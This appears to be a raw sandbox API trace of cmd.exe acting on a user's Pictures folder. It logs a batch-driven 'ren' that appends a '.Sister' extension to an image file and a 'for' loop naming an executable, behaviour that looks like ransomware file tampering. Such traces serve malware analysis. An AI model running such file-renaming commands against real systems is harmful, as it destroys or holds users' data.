[0292.449] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95600 [0292.449] GetProcessHeap () returned 0x21ed8c70000 [0292.449] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c957a0 [0292.449] GetProcessHeap () returned 0x21ed8c70000 [0292.449] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95b00 [0292.449] GetProcessHeap () returned 0x21ed8c70000 [0292.449] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95b00, Size=0x16) returned 0x21ed8c95820 [0292.449] GetProcessHeap () returned 0x21ed8c70000 [0292.449] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95820) returned 0x16 [0292.451] GetProcessHeap () returned 0x21ed8c70000 [0292.451] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c956c0 [0292.451] FindFirstFileExW (in: lpFileName="*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7d0c0 [0292.452] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6e655c4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6e655c4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="..", cAlternateFileName="")) returned 1 [0292.453] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685ef6e0, ftCreationTime.dwHighDateTime=0x1d5eb76, ftLastAccessTime.dwLowDateTime=0x93013f0, ftLastAccessTime.dwHighDateTime=0x1d5e957, ftLastWriteTime.dwLowDateTime=0x93013f0, ftLastWriteTime.dwHighDateTime=0x1d5e957, nFileSizeHigh=0x0, nFileSizeLow=0x8743, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="4f lywQbc0ZJ_8b.gif", cAlternateFileName="")) returned 1 [0292.453] GetProcessHeap () returned 0x21ed8c70000 [0292.453] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30b50 [0292.453] _wcsicmp (_String1="*", _String2=".") returned -4 [0292.454] _wcsicmp (_String1="*", _String2="..") returned -4 [0292.454] GetFileAttributesW (lpFileName="*" (normalized: "c:\\users\\fd1hvy\\pictures\\*")) returned 0xffffffff [0292.454] GetLastError () returned 0x7b [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95840 [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x3a) returned 0x21ed8c7bdf0 [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7bdf0) returned 0x3a [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379db0, Size=0x30) returned 0x21ed9379db0 [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379db0) returned 0x30 [0292.454] GetProcessHeap () returned 0x21ed8c70000 [0292.454] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379df0 [0292.455] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.455] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8c90 [0292.455] ??_V@YAXPEAX@Z () returned 0x1 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.455] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379df0, Size=0x1b0) returned 0x21ed9379df0 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.455] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379df0) returned 0x1b0 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.455] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379fb0 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.455] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379fb0, Size=0x290) returned 0x21ed9379fb0 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.455] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379fb0) returned 0x290 [0292.455] GetProcessHeap () returned 0x21ed8c70000 [0292.456] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a250 [0292.456] GetProcessHeap () returned 0x21ed8c70000 [0292.456] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a250, Size=0x30) returned 0x21ed937a250 [0292.456] GetProcessHeap () returned 0x21ed8c70000 [0292.456] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a250) returned 0x30 [0292.456] GetProcessHeap () returned 0x21ed8c70000 [0292.456] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a290 [0292.456] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0292.456] GetProcessHeap () returned 0x21ed8c70000 [0292.456] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8cd0 [0292.456] ??_V@YAXPEAX@Z () returned 0x1 [0292.456] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0292.456] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cd00 [0292.456] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0292.457] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d000 [0292.457] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0292.457] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6e655c4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6e655c4, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cb80 [0292.457] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0292.457] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685ef6e0, ftCreationTime.dwHighDateTime=0x1d5eb76, ftLastAccessTime.dwLowDateTime=0x93013f0, ftLastAccessTime.dwHighDateTime=0x1d5e957, ftLastWriteTime.dwLowDateTime=0x93013f0, ftLastWriteTime.dwHighDateTime=0x1d5e957, nFileSizeHigh=0x0, nFileSizeLow=0x8743, dwReserved0=0x0, dwReserved1=0x0, cFileName="4f lywQbc0ZJ_8b.gif", cAlternateFileName="4FLYWQ~1.GIF")) returned 0x21ed8c7cee0 [0292.457] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0292.457] _wcsnicmp (_String1="4FLYWQ~1.GIF", _String2="4f lywQbc0ZJ_8b.gif", _MaxCount=0x13) returned 76 [0292.458] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0292.458] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0292.458] GetProcessHeap () returned 0x21ed8c70000 [0292.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8690 [0292.458] ??_V@YAXPEAX@Z () returned 0x1 [0292.458] ??_V@YAXPEAX@Z () returned 0x1 [0292.458] GetProcessHeap () returned 0x21ed8c70000 [0292.458] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a290, Size=0x1b0) returned 0x21ed937a290 [0292.458] GetProcessHeap () returned 0x21ed8c70000 [0292.458] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a290) returned 0x1b0 [0292.458] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0292.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.458] GetFileType (hFile=0x50) returned 0x2 [0292.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.458] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0292.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.460] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0292.466] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.466] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.467] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0292.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.467] GetFileType (hFile=0x50) returned 0x2 [0292.467] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.467] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0292.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.467] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0292.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.468] GetFileType (hFile=0x50) returned 0x2 [0292.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.468] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.468] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9379dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9379dc0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.469] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"4f lywQbc0ZJ_8b.gif\" \"4f lywQbc0ZJ_8b.gif.Sister\" ") returned 52 [0292.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.469] GetFileType (hFile=0x50) returned 0x2 [0292.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.469] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.470] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x34) returned 1 [0292.470] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0292.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.470] GetFileType (hFile=0x50) returned 0x2 [0292.471] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.471] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.472] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.472] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0292.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.472] GetFileType (hFile=0x50) returned 0x2 [0292.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.473] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.473] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0292.473] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0292.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.474] GetFileType (hFile=0x50) returned 0x2 [0292.474] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.474] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.474] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0292.475] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0292.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.475] GetFileType (hFile=0x50) returned 0x2 [0292.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.475] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.475] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0292.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.482] GetFileType (hFile=0x50) returned 0x2 [0292.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.482] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.482] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a260*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed937a260*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.483] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.bat\" ") returned 52 [0292.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.483] GetFileType (hFile=0x50) returned 0x2 [0292.483] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.483] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.484] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x34) returned 1 [0292.484] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0292.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.484] GetFileType (hFile=0x50) returned 0x2 [0292.484] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.484] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0292.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.485] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0292.490] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.492] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.492] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.492] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.492] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.493] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.493] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.493] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.493] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.493] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.493] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.493] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.493] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.493] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.493] ??_V@YAXPEAX@Z () returned 0x1 [0292.493] GetProcessHeap () returned 0x21ed8c70000 [0292.493] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8c7d160 [0292.493] GetProcessHeap () returned 0x21ed8c70000 [0292.493] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d160, Size=0x78) returned 0x21ed8c7d160 [0292.493] GetProcessHeap () returned 0x21ed8c70000 [0292.493] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d160) returned 0x78 [0292.493] GetProcessHeap () returned 0x21ed8c70000 [0292.493] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed93796f0 [0292.494] GetProcessHeap () returned 0x21ed8c70000 [0292.494] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8c7d1f0 [0292.494] GetProcessHeap () returned 0x21ed8c70000 [0292.494] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d1f0, Size=0x78) returned 0x21ed8c7d1f0 [0292.494] GetProcessHeap () returned 0x21ed8c70000 [0292.494] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d1f0) returned 0x78 [0292.494] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.494] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.494] GetProcessHeap () returned 0x21ed8c70000 [0292.494] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d000 [0292.494] GetProcessHeap () returned 0x21ed8c70000 [0292.494] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31780 [0292.494] _wcsicmp (_String1="4f lywQbc0ZJ_8b.gif", _String2=".") returned 6 [0292.494] _wcsicmp (_String1="4f lywQbc0ZJ_8b.gif", _String2="..") returned 6 [0292.494] GetFileAttributesW (lpFileName="4f lywQbc0ZJ_8b.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif")) returned 0x20 [0292.495] GetProcessHeap () returned 0x21ed8c70000 [0292.495] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9380080 [0292.496] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9380090 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.496] SetErrorMode (uMode=0x0) returned 0x0 [0292.496] SetErrorMode (uMode=0x1) returned 0x0 [0292.496] GetFullPathNameW (in: lpFileName="4f lywQbc0ZJ_8b.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed97bfc00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif", lpFilePart=0xa6cf4fd660*="4f lywQbc0ZJ_8b.gif") returned 0x2c [0292.497] SetErrorMode (uMode=0x0) returned 0x1 [0292.497] GetProcessHeap () returned 0x21ed8c70000 [0292.497] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31510 [0292.497] _wcsicmp (_String1="4f lywQbc0ZJ_8b.gif", _String2=".") returned 6 [0292.497] _wcsicmp (_String1="4f lywQbc0ZJ_8b.gif", _String2="..") returned 6 [0292.497] GetFileAttributesW (lpFileName="4f lywQbc0ZJ_8b.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif")) returned 0x20 [0292.497] ??_V@YAXPEAX@Z () returned 0x1 [0292.497] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0292.497] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0292.497] malloc (_Size=0xffce) returned 0x21ed97cfbe0 [0292.497] ??_V@YAXPEAX@Z () returned 0x21ed97cfbe0 [0292.497] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif")) returned 0x20 [0292.497] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.497] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.498] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed8d31790, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d31790) returned 0x21ed8c7cca0 [0292.498] malloc (_Size=0xffce) returned 0x21ed97efba0 [0292.498] ??_V@YAXPEAX@Z () returned 0x21ed97efba0 [0292.499] ??_V@YAXPEAX@Z () returned 0x1 [0292.499] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\4f lywQbc0ZJ_8b.gif.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\4f lywqbc0zj_8b.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0292.502] FindNextFileW (in: hFindFile=0x21ed8c7cca0, lpFindFileData=0x21ed8d31790 | out: lpFindFileData=0x21ed8d31790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685ef6e0, ftCreationTime.dwHighDateTime=0x1d5eb76, ftLastAccessTime.dwLowDateTime=0x93013f0, ftLastAccessTime.dwHighDateTime=0x1d5e957, ftLastWriteTime.dwLowDateTime=0x93013f0, ftLastWriteTime.dwHighDateTime=0x1d5e957, nFileSizeHigh=0x0, nFileSizeLow=0x8743, dwReserved0=0x0, dwReserved1=0x0, cFileName="4f lywQbc0ZJ_8b.gif", cAlternateFileName="")) returned 0 [0292.510] GetLastError () returned 0x12 [0292.510] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0292.512] ??_V@YAXPEAX@Z () returned 0x1 [0292.512] ??_V@YAXPEAX@Z () returned 0x1 [0292.512] ??_V@YAXPEAX@Z () returned 0x1 [0292.512] ??_V@YAXPEAX@Z () returned 0x1 [0292.512] GetProcessHeap () returned 0x21ed8c70000 [0292.512] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cac0 [0292.512] GetProcessHeap () returned 0x21ed8c70000 [0292.512] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95600, Size=0x16) returned 0x21ed8c95840 [0292.513] GetProcessHeap () returned 0x21ed8c70000 [0292.513] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95840) returned 0x16 [0292.513] GetProcessHeap () returned 0x21ed8c70000 [0292.513] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c957a0, Size=0x20) returned 0x21ed8d45bf0 [0292.513] GetProcessHeap () returned 0x21ed8c70000 